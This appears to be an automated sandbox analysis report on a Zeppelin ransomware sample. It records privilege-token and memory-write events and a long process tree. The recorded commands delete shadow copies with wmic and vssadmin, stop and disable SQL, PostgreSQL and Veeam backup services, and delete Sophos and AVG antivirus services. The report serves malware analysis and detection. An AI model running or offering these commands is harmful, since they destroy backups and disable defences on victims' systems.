Token: SeDebugPrivilege	3952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3952	WMIC.exe
Token: SeRemoteShutdownPrivilege	3952	WMIC.exe
Token: SeUndockPrivilege	3952	WMIC.exe
Token: SeManageVolumePrivilege	3952	WMIC.exe
Token: 33	3952	WMIC.exe
Token: 34	3952	WMIC.exe
Token: 35	3952	WMIC.exe
Token: 36	3952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4064	WMIC.exe
Token: SeSecurityPrivilege	4064	WMIC.exe
Token: SeTakeOwnershipPrivilege	4064	WMIC.exe
Token: SeLoadDriverPrivilege	4064	WMIC.exe
Token: SeSystemProfilePrivilege	4064	WMIC.exe
Token: SeSystemtimePrivilege	4064	WMIC.exe
Token: SeProfSingleProcessPrivilege	4064	WMIC.exe
Token: SeIncBasePriorityPrivilege	4064	WMIC.exe
Token: SeCreatePagefilePrivilege	4064	WMIC.exe
Token: SeBackupPrivilege	4064	WMIC.exe
Token: SeRestorePrivilege	4064	WMIC.exe
Token: SeShutdownPrivilege	4064	WMIC.exe
Token: SeDebugPrivilege	4064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4064	WMIC.exe
Token: SeRemoteShutdownPrivilege	4064	WMIC.exe
Token: SeUndockPrivilege	4064	WMIC.exe
Token: SeManageVolumePrivilege	4064	WMIC.exe
Token: 33	4064	WMIC.exe
Token: 34	4064	WMIC.exe
Token: 35	4064	WMIC.exe
Token: 36	4064	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4064	WMIC.exe
Token: SeSecurityPrivilege	4064	WMIC.exe
Token: SeTakeOwnershipPrivilege	4064	WMIC.exe
Token: SeLoadDriverPrivilege	4064	WMIC.exe
Token: SeSystemProfilePrivilege	4064	WMIC.exe
Token: SeSystemtimePrivilege	4064	WMIC.exe
Token: SeProfSingleProcessPrivilege	4064	WMIC.exe
Token: SeIncBasePriorityPrivilege	4064	WMIC.exe
Token: SeCreatePagefilePrivilege	4064	WMIC.exe
Token: SeBackupPrivilege	4064	WMIC.exe
Token: SeRestorePrivilege	4064	WMIC.exe
Token: SeShutdownPrivilege	4064	WMIC.exe
Token: SeDebugPrivilege	4064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4064	WMIC.exe
Token: SeRemoteShutdownPrivilege	4064	WMIC.exe
Token: SeUndockPrivilege	4064	WMIC.exe
Token: SeManageVolumePrivilege	4064	WMIC.exe
Token: 33	4064	WMIC.exe
Token: 34	4064	WMIC.exe
Token: 35	4064	WMIC.exe
Token: 36	4064	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3952	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.execmd.execmd.exe

description	pid	Process	procid_target
PID 4184 wrote to memory of 2508	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	86
PID 4184 wrote to memory of 2508	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	86
PID 4184 wrote to memory of 2508	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	86
PID 4184 wrote to memory of 1692	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	93
PID 4184 wrote to memory of 1692	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	93
PID 4184 wrote to memory of 1692	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	93
PID 4184 wrote to memory of 5012	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	92
PID 4184 wrote to memory of 5012	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	92
PID 4184 wrote to memory of 5012	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	92
PID 4184 wrote to memory of 4140	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	91
PID 4184 wrote to memory of 4140	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	91
PID 4184 wrote to memory of 4140	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	91
PID 4184 wrote to memory of 4968	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	87
PID 4184 wrote to memory of 4968	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	87
PID 4184 wrote to memory of 4968	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	87
PID 4184 wrote to memory of 2484	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	90
PID 4184 wrote to memory of 2484	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	90
PID 4184 wrote to memory of 2484	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	90
PID 4184 wrote to memory of 1036	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	89
PID 4184 wrote to memory of 1036	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	89
PID 4184 wrote to memory of 1036	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	89
PID 4184 wrote to memory of 1496	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	88
PID 4184 wrote to memory of 1496	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	88
PID 4184 wrote to memory of 1496	4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe	88
PID 2508 wrote to memory of 4064	2508	cmd.exe	101
PID 2484 wrote to memory of 3952	2484	cmd.exe	100
PID 2508 wrote to memory of 4064	2508	cmd.exe	101
PID 2484 wrote to memory of 3952	2484	cmd.exe	100
PID 2508 wrote to memory of 4064	2508	cmd.exe	101
PID 2484 wrote to memory of 3952	2484	cmd.exe	100
PID 2484 wrote to memory of 1844	2484	cmd.exe	111
PID 2484 wrote to memory of 1844	2484	cmd.exe	111
PID 2484 wrote to memory of 1844	2484	cmd.exe	111
PID 2484 wrote to memory of 4196	2484	cmd.exe	112
PID 2484 wrote to memory of 4196	2484	cmd.exe	112
PID 2484 wrote to memory of 4196	2484	cmd.exe	112
PID 2484 wrote to memory of 4040	2484	cmd.exe	113
PID 2484 wrote to memory of 4040	2484	cmd.exe	113
PID 2484 wrote to memory of 4040	2484	cmd.exe	113
PID 2484 wrote to memory of 4808	2484	cmd.exe	114
PID 2484 wrote to memory of 4808	2484	cmd.exe	114
PID 2484 wrote to memory of 4808	2484	cmd.exe	114
PID 2484 wrote to memory of 2804	2484	cmd.exe	115
PID 2484 wrote to memory of 2804	2484	cmd.exe	115
PID 2484 wrote to memory of 2804	2484	cmd.exe	115
PID 2484 wrote to memory of 1980	2484	cmd.exe	116
PID 2484 wrote to memory of 1980	2484	cmd.exe	116
PID 2484 wrote to memory of 1980	2484	cmd.exe	116
PID 2484 wrote to memory of 4872	2484	cmd.exe	117
PID 2484 wrote to memory of 4872	2484	cmd.exe	117
PID 2484 wrote to memory of 4872	2484	cmd.exe	117
PID 2484 wrote to memory of 3484	2484	cmd.exe	118
PID 2484 wrote to memory of 3484	2484	cmd.exe	118
PID 2484 wrote to memory of 3484	2484	cmd.exe	118
PID 2484 wrote to memory of 4152	2484	cmd.exe	119
PID 2484 wrote to memory of 4152	2484	cmd.exe	119
PID 2484 wrote to memory of 4152	2484	cmd.exe	119
PID 2484 wrote to memory of 764	2484	cmd.exe	120
PID 2484 wrote to memory of 764	2484	cmd.exe	120
PID 2484 wrote to memory of 764	2484	cmd.exe	120
PID 2484 wrote to memory of 3068	2484	cmd.exe	121
PID 2484 wrote to memory of 3068	2484	cmd.exe	121
PID 2484 wrote to memory of 3068	2484	cmd.exe	121
PID 2484 wrote to memory of 4356	2484	cmd.exe	122

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
"C:\Users\Admin\AppData\Local\Temp\2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe"
1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4064
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
  2⤵
  PID:4968
- C:\Users\Admin\AppData\Local\Temp\2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
  "C:\Users\Admin\AppData\Local\Temp\2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe" -agent 1
  2⤵
  PID:1496
- C:\Users\Admin\AppData\Local\Temp\2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
  "C:\Users\Admin\AppData\Local\Temp\2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe" -agent 0
  2⤵
  - Drops file in Program Files directory
  PID:1036
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3952
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    WMIC.exe shadowcopy delete /nointeractive
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher$CITRIX
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher$CITRIX start=disabled
    3⤵
    - Launches sc.exe
    PID:4040
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher
    3⤵
    PID:4808
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher start=disabled
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$CITRIX
    3⤵
    - Launches sc.exe
    PID:1980
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$CITRIX start=disabled
    3⤵
    PID:4872
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    - Launches sc.exe
    PID:4152
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLSERVERAGENT
    3⤵
    PID:764
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLSERVERAGENT start=disabled
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSOLAP$CITRIX
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\sc.exe
    sc config MSOLAP$CITRIX start=disabled
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLBrowser
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLBrowser start=disabled
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLWriter
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLWriter start=disabled
    3⤵
    - Launches sc.exe
    PID:912
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$SQLEXPRESS
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$SQLEXPRESS start=disabled
    3⤵
    - Launches sc.exe
    PID:4684
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:860
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\sc.exe
    sc stop postgresql-9.5
    3⤵
    PID:4812
- - C:\Windows\SysWOW64\sc.exe
    sc config postgresql-9.5 start=disabled
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsdevcon
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\sc.exe
    sc config fsdevcon start=disabled
    3⤵
    PID:1020
- - C:\Windows\SysWOW64\sc.exe
    sc stop fshoster
    3⤵
    PID:492
- - C:\Windows\SysWOW64\sc.exe
    sc config fshoster start=disabled
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsnethoster
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\sc.exe
    sc config fsnethoster start=disabled
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulhoster
    3⤵
    PID:3268
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulhoster start=disabled
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulnethoster
    3⤵
    - Launches sc.exe
    PID:4652
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulnethoster start=disabled
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulorsp
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulorsp start=disabled
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulprothoster
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulprothoster start=disabled
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\sc.exe
    sc stop FSAUS
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\sc.exe
    sc config FSAUS start=disabled
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsms
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\sc.exe
    sc config fsms start=disabled
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamAWSSvc
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamAWSSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:2688
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamAzureSvc
    3⤵
    - Launches sc.exe
    PID:4588
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamAzureSvc start=disabled
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamEnterpriseManagerSvc
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamEnterpriseManagerSvc start=disabled
    3⤵
    PID:4064
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupRESTSvc
    3⤵
    PID:940
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupRESTSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:976
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupSvc
    3⤵
    - Launches sc.exe
    PID:3548
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupSvc start=disabled
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamFilesysVssSvc
    3⤵
    PID:3916
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamFilesysVssSvc start=disabled
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBrokerSvc
    3⤵
    - Launches sc.exe
    PID:4644
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBrokerSvc start=disabled
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupCdpSvc
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupCdpSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:4976
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamCloudSvc
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamCloudSvc start=disabled
    3⤵
    PID:3140
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamTransportSvc
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamTransportSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:4892
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamDistributionSvc
    3⤵
    PID:4808
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamDistributionSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:2412
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamExplorersRecoverySvc
    3⤵
    PID:3440
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamExplorersRecoverySvc start=disabled
    3⤵
    - Launches sc.exe
    PID:1640
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamGCPSvc
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamGCPSvc start=disabled
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamGuestHelper
    3⤵
    PID:828
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamGuestHelper start=disabled
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamCatalogSvc
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamCatalogSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:3812
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamHvIntegrationSvc
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamHvIntegrationSvc start=disabled
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamDeploySvc
    3⤵
    - Launches sc.exe
    PID:208
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamDeploySvc start=disabled
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamMountSvc
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamMountSvc start=disabled
    3⤵
    PID:4812
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamRESTSvc
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamRESTSvc start=disabled
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamNFSSvc
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamNFSSvc start=disabled
    3⤵
    PID:4604
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamVssProviderSvc
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamVssProviderSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:2808
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher$CITRIX
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher$CITRIX start= disabled
    3⤵
    - Launches sc.exe
    PID:3820
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$VEEAMSQL2016
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$VEEAMSQL2016 start=disabled
    3⤵
    - Launches sc.exe
    PID:4600
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLBrowser
    3⤵
    PID:4208
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLBrowser start=disabled
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$VEEAMSQL2016
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$VEEAMSQL2016 start=disabled
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLWriter
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLWriter start=disabled
    3⤵
    - Launches sc.exe
    PID:3184
- - C:\Windows\SysWOW64\sc.exe
    sc stop SageMySQL
    3⤵
    PID:5032
- - C:\Windows\SysWOW64\sc.exe
    sc config SageMySQL start=disabled
    3⤵
    PID:3888
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$VEEAMSQL2016
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$VEEAMSQL2016 start=disabled
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\sc.exe
    sc stop ReportServer$V4SQLEXPRESS
    3⤵
    PID:684
- - C:\Windows\SysWOW64\sc.exe
    sc config ReportServer$V4SQLEXPRESS start=disabled
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$SDPRO_V4_SQL
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$SDPRO_V4_SQL start=disabled
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$MICROSOFT##WID
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$MICROSOFT##WID start=disabled
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLServerOLAPService
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLServerOLAPService start=disabled
    3⤵
    - Launches sc.exe
    PID:3036
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher
    3⤵
    PID:712
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher start=disabled
    3⤵
    PID:396
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLSERVERAGENT
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLSERVERAGENT start=disabled
    3⤵
    - Launches sc.exe
    PID:3316
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY
    3⤵
    PID:892
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY start=disabled
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\sc.exe
    sc stop MsDtsServer130
    3⤵
    PID:764
- - C:\Windows\SysWOW64\sc.exe
    sc config MsDtsServer130 start=disabled
    3⤵
    - Launches sc.exe
    PID:3068
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$BVMS
    3⤵
    - Launches sc.exe
    PID:2096
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$BVMS start=disabled
    3⤵
    - Launches sc.exe
    PID:3160
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$SQLEXPRESS2014
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$SQLEXPRESS2014 start=disabled
    3⤵
    - Launches sc.exe
    PID:2860
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:432
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmickvpexchange"
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicguestinterface"
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicshutdown"
    3⤵
    - Launches sc.exe
    PID:2828
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicheartbeat"
    3⤵
    PID:492
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicrdv"
    3⤵
    - Launches sc.exe
    PID:1528
- - C:\Windows\SysWOW64\sc.exe
    sc delete "storflt"
    3⤵
    PID:832
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmictimesync"
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicvss"
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hvdsvc"
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\sc.exe
    sc delete "nvspwmi"
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\sc.exe
    sc delete "wmms"
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AvgAdminServer"
    3⤵
    - Launches sc.exe
    PID:3748
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVG Antivirus"
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\sc.exe
    sc delete "avgAdminClient"
    3⤵
    PID:956
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVService"
    3⤵
    - Launches sc.exe
    PID:4476
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVAdminService"
    3⤵
    - Launches sc.exe
    PID:3576
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos AutoUpdate Service"
    3⤵
    - Launches sc.exe
    PID:3492
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Clean Service"
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Device Control Service"
    3⤵
    - Launches sc.exe
    PID:1804
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    - Launches sc.exe
    PID:2628
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos File Scanner Service"
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Health Service"
    3⤵
    PID:988
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Agent"
    3⤵
    - Launches sc.exe
    PID:2912
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Client"
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SntpService"
    3⤵
    PID:3752
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swc_service"
    3⤵
    - Launches sc.exe
    PID:4132
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_service"
    3⤵
    PID:684
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos UI"
    3⤵
    - Launches sc.exe
    PID:2016
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_update"
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Web Control Service"
    3⤵
    PID:4636
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos System Protection Service"
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Safestore Service"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hmpalertsvc"
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RpcEptMapper"
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    - Launches sc.exe
    PID:4112
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SophosFIM"
    3⤵
    - Launches sc.exe
    PID:2316
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_filter"
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdGuardianDefaultInstance"
    3⤵
    PID:3844
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdServerDefaultInstance"
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher"
    3⤵
    PID:3800
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLSERVER"
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLSERVERAGENT"
    3⤵
    - Launches sc.exe
    PID:4420
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLBrowser"
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY"
    3⤵
    - Launches sc.exe
    PID:2860
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer130"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SSISTELEMETRY130"
    3⤵
    - Launches sc.exe
    PID:3596
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLWriter"
    3⤵
    - Launches sc.exe
    PID:5056
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$VEEAMSQL2012"
    3⤵
    PID:832
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL"
    3⤵
    PID:532
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent"
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerADHelper100"
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerOLAPService"
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer100"
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer"
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY$HL"
    3⤵
    PID:448
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMBMServer"
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$PROGID"
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$WOLTERSKLUWER"
    3⤵
    PID:4028
